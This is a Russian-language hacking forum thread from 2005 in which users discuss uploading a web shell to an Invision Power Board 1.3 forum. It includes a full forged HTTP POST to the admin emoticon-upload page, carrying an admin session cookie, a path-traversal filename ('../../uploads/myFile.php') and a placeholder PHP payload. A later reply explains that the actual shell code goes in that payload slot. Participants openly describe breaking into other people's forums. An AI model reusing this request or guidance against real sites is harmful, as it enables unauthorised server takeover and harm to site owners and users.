Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Залить шелл через подделку http запросов, на примере ipb 1.3 (https://forum.antichat.xyz/showthread.php?t=5461)

SURRENDER 15.03.2005 02:10
Залить шелл через подделку http запросов, на примере ipb 1.3
 
Вот Я дошёл до того момента где нужно залить шелл :) прав на папке со смайлами конечно же не оказалось...

POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adses...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить? :confused:

(-=util=-) 15.03.2005 02:19
А если у тебя хэш cf20fc37b4g0be45c1336f29d444e798 и id то разве нельзя потделать куки вместо http запроса? и зайти админом ? :) Или я что то путаю?

SURRENDER 15.03.2005 02:34
Да это само собой, Я уже в админке, но мне не форум нужен :)

mikrobx 15.03.2005 02:54
да я тоже взламываю форум и хочу болше как залит шелл ???????

(-=util=-) 15.03.2005 03:24
аа.. всё торможу как всегда =) Да. Меня тоже вопрос волнует этот. Где пареметры на локальный адрес.. :confused:

SURRENDER 17.03.2005 05:35
Algol, пожалуйста, обрати внимание! =\

White Jordan 17.03.2005 05:40
Ну просто много LOL!!!!!!!

Ага щас он вам поможет!!!! LOL!!!!!!! :D :D :D :D :D :D :D :D

SURRENDER 17.03.2005 08:43
Ну он же эту статью писал (про ipb1.3) он должен знать...

(-=util=-) 17.03.2005 13:40
ну что никто неотвечает? Вообще последнее время что то нету активного народа не форуме....

Algol 17.03.2005 13:50
Цитата:
Сообщение от SURRENDER

Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить? :confused:
Какой еще файл?? Вся отсылаемая на сервер информация УЖЕ содержится в HTTP-пакете.
А вот это
PHP код:
<% echo("Hello from injected PHP script") %> 
и есть сам скрипт, который ты заливаешь. Вместо приведенного, тебе естественно, нужно вставить текст шелла.


Время: 17:48
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице